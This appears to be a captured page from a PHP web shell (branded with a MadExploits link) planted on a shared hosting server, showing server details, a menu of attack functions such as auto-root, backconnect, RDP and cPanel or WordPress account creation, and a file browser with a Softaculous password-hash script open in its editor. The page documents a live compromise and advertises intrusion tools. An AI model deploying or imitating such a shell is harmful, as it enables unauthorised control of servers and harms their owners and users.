Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
peel /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
clone.php
5.59
KB
-rw-r--r--
edit.php
4.96
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
fileindex.php
512
B
-rw-r--r--
import.php
3.12
KB
-rw-r--r--
info.xml
4.57
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
10.6
KB
-rw-r--r--
install.xml
1.05
KB
-rw-r--r--
md5
12.75
KB
-rw-r--r--
notes.txt
742
B
-rw-r--r--
update_pass.php
1.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_pass.php
<?php $resp = __get_user_password_hash('[[admin_pass]]'); echo '<update_pass>'.$resp.'</update_pass>'; function __get_user_password_hash($password, $tested_hash = null, $password_given_as_first_password_hash = false, $password_length_if_given_as_first_password_hash = null) { if ($tested_hash == md5($password)) { return $tested_hash; } if (!$password_given_as_first_password_hash) { // Création d'un premier hash du mot de passe $first_password_hash = hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]'.$password); // set where salt will appear in hash $salt_start = strlen($password); } else { $first_password_hash = $password; $salt_start = $password_length_if_given_as_first_password_hash; } // if no salt given create random one if ($tested_hash == null) { $salt_hash = substr(hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]'. uniqid(mt_rand(), true)), 0, 6); } else { $salt_hash = substr($tested_hash, 0, 6); } // add salt into text hash at pass length position and hash it if ($salt_start > 0 && $salt_start < strlen($salt_hash)) { $first_password_hash_start = substr($first_password_hash, 0, $salt_start); $first_password_hash_end = substr($first_password_hash, $salt_start, strlen($salt_hash)); $hash_rough = hash('sha256' , 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]'. $first_password_hash_end . $salt_hash . $first_password_hash_start); } elseif ($salt_start > (strlen($salt_hash) - 1)) { $hash_rough = hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]' . $first_password_hash . $salt_hash); } else { $hash_rough = hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]' . $salt_hash . $first_password_hash); } // put salt at front of hash $password_hash = $salt_hash . substr($hash_rough, 0, 26); if (empty($tested_hash) || $tested_hash == $password_hash) { return $password_hash; } } @unlink('update_pass.php'); ?>
Close